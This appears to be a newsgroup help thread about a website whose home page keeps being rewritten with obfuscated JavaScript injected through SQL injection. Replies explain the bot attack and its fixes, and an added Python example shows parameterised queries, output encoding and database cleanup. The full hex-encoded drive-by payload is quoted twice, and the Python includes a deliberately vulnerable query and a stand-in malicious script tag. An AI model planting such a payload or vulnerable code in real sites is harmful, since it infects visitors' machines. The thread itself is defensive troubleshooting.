new type of injection? rewrite default document?

  • Brian Bozarth

    new type of injection? rewrite default document?

    This is weird, I'm pretty familiar with SQL Injection - but we're getting
    this weird injection that is writing into the default document or home page.
    What it's doing is putting in script code at the top or bottom of the home
    page... it looks something like this:

    <script>functio n xy1q4877d47d91a 36(q4877d47d922 09){ function q4877d47d929d5
    () {return 16;} return (parseInt(q4877 d47d92209,q4877 d47d929d5()));} function
    q4877d47d93974( q4877d47d94144) { var q4877d47d95c9b= 2; var
    q4877d47d94d7f= '';q4877d47d96c 3a=String.fromC harCode;for(q48 77d47d954cc=0;q 4877d47d954cc<q 4877d47d94144.l ength;q4877d47d 954cc+=q4877d47 d95c9b){
    q4877d47d94d7f+ =(q4877d47d96c3 a(xy1q4877d47d9 1a36(q4877d47d9 4144.substr(q48 77d47d954cc,q48 77d47d95c9b)))) ;}return
    q4877d47d94d7f; } var
    q4877d47d9740a= '3C736372697074 3E696628216D796 961297B646F6375 6D656E742E77726 9746528756E6573 636170652820272 533632536392536 362537322536312 536642536352532 302537332537322 536332533642532 372536382537342 537342537302533 612532662532662 537342537322537 352536352537322 536392536652536 372537342536662 536652536352537 332532652536652 536352537342532 662537332536352 536312537322536 332536382532652 536332536372536 392533662536322 536312536312536 372536392537322 536632625323725 326225346425363 125373425363825 326525373225366 625373525366525 363425323825346 425363125373425 363825326525373 225363125366525 363425366625366 425323825323925 326125333525333 525333525333625 333725323925326 225323725363425 333525333225333 825323725323025 373725363925363 425373425363825 336425333125333 825333125323025 363825363525363 925363725363825 373425336425333 325333025333725 323025373325373 425373925366325 363525336425323 725363425363925 373325373025366 325363125373925 336125323025366 525366625366525 363525323725336 525336325326625 363925363625373 225363125366425 363525336527292 93B7D766172206D 7969613D7472756 53B3C2F73637269 70743E';documen t.write(q4877d4 7d93974(q4877d4 7d9740a));</script>

    What it's doing is decoding itself into an iframe that links out to popups
    that will try and download a virus on your machine. I don't get the popup
    on my machine because I think I have a newer version of IE. But some
    people have complained that it is installing a virus on their machine.

    Also what is crazy is when I replace the file with a good version. In
    about 30 mins, it is automatically overwritten with the infected version.
    Also I've noticed it on some other websites that I haven't touched.

    Has anyone encountered this before? Because I'm stumped as to the cause of
    it. I don't see the issue on our dev server. It seems to be IIS on a
    shared host.

    Brian


  • ThatsIT.net.au

    #2
    Re: new type of injection? rewrite default document?

    It would seem you have a virus on your machine that is adding the code.

    This is just a thought, I don't know if it will work, but try auditing access
    to the file. Maybe then you can at least see what user the virus is running
    under. Look in your task manager for processes running.

    "Brian Bozarth" <brian@spaceboyinteractive.com> wrote in message
    news:eRZypv54IHA.2060@TK2MSFTNGP02.phx.gbl...
    This is weird, I'm pretty familiar with SQL Injection - but we're getting
    this weird injection that is writing into the default document or home
    page. What it's doing is putting in script code at the top or bottom of
    the home page... it looks something like this:
    >
    <script>functio n xy1q4877d47d91a 36(q4877d47d922 09){ function
    q4877d47d929d5 () {return 16;} return
    (parseInt(q4877 d47d92209,q4877 d47d929d5()));} function
    q4877d47d93974( q4877d47d94144) { var q4877d47d95c9b= 2; var
    q4877d47d94d7f= '';q4877d47d96c 3a=String.fromC harCode;for(q48 77d47d954cc=0;q 4877d47d954cc<q 4877d47d94144.l ength;q4877d47d 954cc+=q4877d47 d95c9b){
    q4877d47d94d7f+ =(q4877d47d96c3 a(xy1q4877d47d9 1a36(q4877d47d9 4144.substr(q48 77d47d954cc,q48 77d47d95c9b)))) ;}return
    q4877d47d94d7f; } var
    q4877d47d9740a= '3C736372697074 3E696628216D796 961297B646F6375 6D656E742E77726 9746528756E6573 636170652820272 533632536392536 362537322536312 536642536352532 302537332537322 536332533642532 372536382537342 537342537302533 612532662532662 537342537322537 352536352537322 536392536652536 372537342536662 536652536352537 332532652536652 536352537342532 662537332536352 536312537322536 332536382532652 536332536372536 392533662536322 536312536312536 372536392537322 536632625323725 326225346425363 125373425363825 326525373225366 625373525366525 363425323825346 425363125373425 363825326525373 225363125366525 363425366625366 425323825323925 326125333525333 525333525333625 333725323925326 225323725363425 333525333225333 825323725323025 373725363925363 425373425363825 336425333125333 825333125323025 363825363525363 925363725363825 373425336425333 325333025333725 323025373325373 425373925366325 363525336425323 725363425363925 373325373025366 325363125373925 336125323025366 525366625366525 363525323725336 525336325326625 363925363625373 225363125366425 363525336527292 93B7D766172206D 7969613D7472756 53B3C2F73637269 70743E';documen t.write(q4877d4 7d93974(q4877d4 7d9740a));</script>
    >
    What it's doing is decoding itself into an iframe that links out to popups
    that will try and download a virus on your machine. I don't get the
    popup on my machine because I think I have a newer version of IE. But
    some people have complained that it is installing a virus on their
    machine.
    >
    Also what is crazy is when I replace the file with a good version. In
    about 30 mins, it is automatically overwritten with the infected version.
    Also I've noticed it on some other websites that I haven't touched.
    >
    Has anyone encountered this before? Because I'm stumped as to the cause
    of it. I don't see the issue on our dev server. It seems to be IIS on
    a shared host.
    >
    Brian
    >


    • Bob Barrows [MVP]

      #3
      Re: new type of injection? rewrite default document?

      Brian Bozarth wrote:
      This is weird, I'm pretty familiar with SQL Injection - but we're
      getting this weird injection that is writing into the default document or
      home page. What it's doing is putting in script code at the top or bottom
      of the home page... it looks something like this:
      >
      Browse through the several threads about sql injection that have been posted
      in the last couple weeks. You should find posts that mention these links:


      SANS Internet Storm Center

      In a nutshell, you've been attacked by a bot that uses google to find sites
      that might be vulnerable to sql injection, based on the use of querystrings
      in the urls. It then runs through a scripted routine to find the
      vulnerabilities in the sites, and if they exist, uses those vulnerabilities
      to insert those script tags you are seeing into every table in your
      database. Since your code is likely to be writing data retrieved from the
      database to Response without validating or encoding it, it's really your
      code that is inserting the script tags into your pages.

      So the first thing you should do is check the data in your database. If
      corrupt, take it offline and restore a backup, or run a stored procedure
      which was posted by Old Pedant to attempt to cleanse it. Then, go through
      your server-side code with a fine tooth comb and

      1. Make your code impervious to sql injection by eliminating all use of
      dynamic sql, using parameters instead.
      See here for a better, more secure way to execute your queries by using
      parameter markers:


      Personally, I prefer using stored procedures, or saved parameter queries as
      they are known in Access:

      Access:





      SQL Server:




      2. Use Server.HTMLEncode when writing data to Response



      --
      Microsoft MVP - ASP/ASP.NET
      Please reply to the newsgroup. This email account is my spam trap so I
      don't check it very often. If you must reply off-line, then remove the
      "NO SPAM"
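The three steps Bob lays out (check the database for the injected tags, replace dynamic SQL with parameter markers, and encode on output) as one worked example. This is added code, not from the thread or from any poster: it uses Python's sqlite3 and html modules as stand-ins for ADO and Server.HTMLEncode, and the products table, its rows and the injected tag are all constructed. The catalog walk and cleanse routine are my own design, not the stored procedure by Old Pedant that Bob mentions.

```python
import html
import sqlite3

# Constructed stand-in for the injected tag the thread describes; the real
# payload from the thread is not reproduced here.
INJECTED_TAG = '<script src="http://example.invalid/x.js"></script>'
MARKER = "<script"


def qi(name):
    """Quote a catalog-supplied identifier (table or column name) for SQLite."""
    return '"' + name.replace('"', '""') + '"'


def build_sample_db():
    """Constructed sample database: one row already carries the injected tag,
    the way text columns end up looking after the attack Bob describes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, blurb TEXT)")
    conn.executemany(
        "INSERT INTO products (name, blurb) VALUES (?, ?)",
        [("Widget", "A plain widget."), ("Gadget", "Useful gadget." + INJECTED_TAG)],
    )
    conn.commit()
    return conn


def lookup_dynamic_sql(conn, product_id):
    """The vulnerable pattern: a querystring value pasted into the SQL text.
    Whatever the caller appends becomes part of the WHERE clause."""
    sql = "SELECT name FROM products WHERE id = " + product_id
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterised(conn, product_id):
    """Bob's step 1: a parameter marker. The value travels separately from the
    SQL text, so "1 OR 1=1" is compared as one literal and matches nothing."""
    sql = "SELECT name FROM products WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (product_id,))]


def render_encoded(value):
    """Bob's step 2: encode on output (html.escape here, Server.HTMLEncode in
    classic ASP), so a tag stored in the database renders as text, not markup."""
    return "<p>" + html.escape(value, quote=True) + "</p>"


def find_injected_rows(conn, marker=MARKER):
    """Walk every table and every text column named in the catalog and report
    rows containing the marker. Names come from sqlite_master, not from users,
    and are still quoted with qi() before being placed in the SQL."""
    hits = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _cid, col, ctype, *_rest in conn.execute(f"PRAGMA table_info({qi(table)})"):
            if "CHAR" not in ctype.upper() and "TEXT" not in ctype.upper():
                continue
            q = f"SELECT rowid FROM {qi(table)} WHERE instr(lower({qi(col)}), ?) > 0"
            hits += [(table, col, rowid) for (rowid,) in conn.execute(q, (marker.lower(),))]
    return hits


def cleanse(conn, marker=MARKER):
    """Strip each injected <script ...>...</script> span from the rows found,
    case-insensitively, and return how many rows were rewritten."""
    fixed = 0
    for table, col, rowid in find_injected_rows(conn, marker):
        (val,) = conn.execute(
            f"SELECT {qi(col)} FROM {qi(table)} WHERE rowid = ?", (rowid,)).fetchone()
        while True:
            start = val.lower().find(marker.lower())
            if start < 0:
                break
            end = val.lower().find("</script>", start)
            end = len(val) if end < 0 else end + len("</script>")
            val = val[:start] + val[end:]
        conn.execute(f"UPDATE {qi(table)} SET {qi(col)} = ? WHERE rowid = ?", (val, rowid))
        fixed += 1
    conn.commit()
    return fixed


if __name__ == "__main__":
    db = build_sample_db()
    print("dynamic SQL, id='1 OR 1=1':", lookup_dynamic_sql(db, "1 OR 1=1"))
    print("parameterised, id='1 OR 1=1':", lookup_parameterised(db, "1 OR 1=1"))
    print("injected rows:", find_injected_rows(db))
    print("encoded output:", render_encoded(INJECTED_TAG))
    print("rows cleansed:", cleanse(db))
```

Run it as a script to see the two lookups side by side: the concatenated query returns every product for the input "1 OR 1=1", the parameterised one returns none. The catalog walk is the part worth keeping around after the cleanup, run on a schedule, since the thread reports the tags coming back within about 30 minutes; a non-empty result from find_injected_rows is the signal that the injection path is still open and step 1 is not finished.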

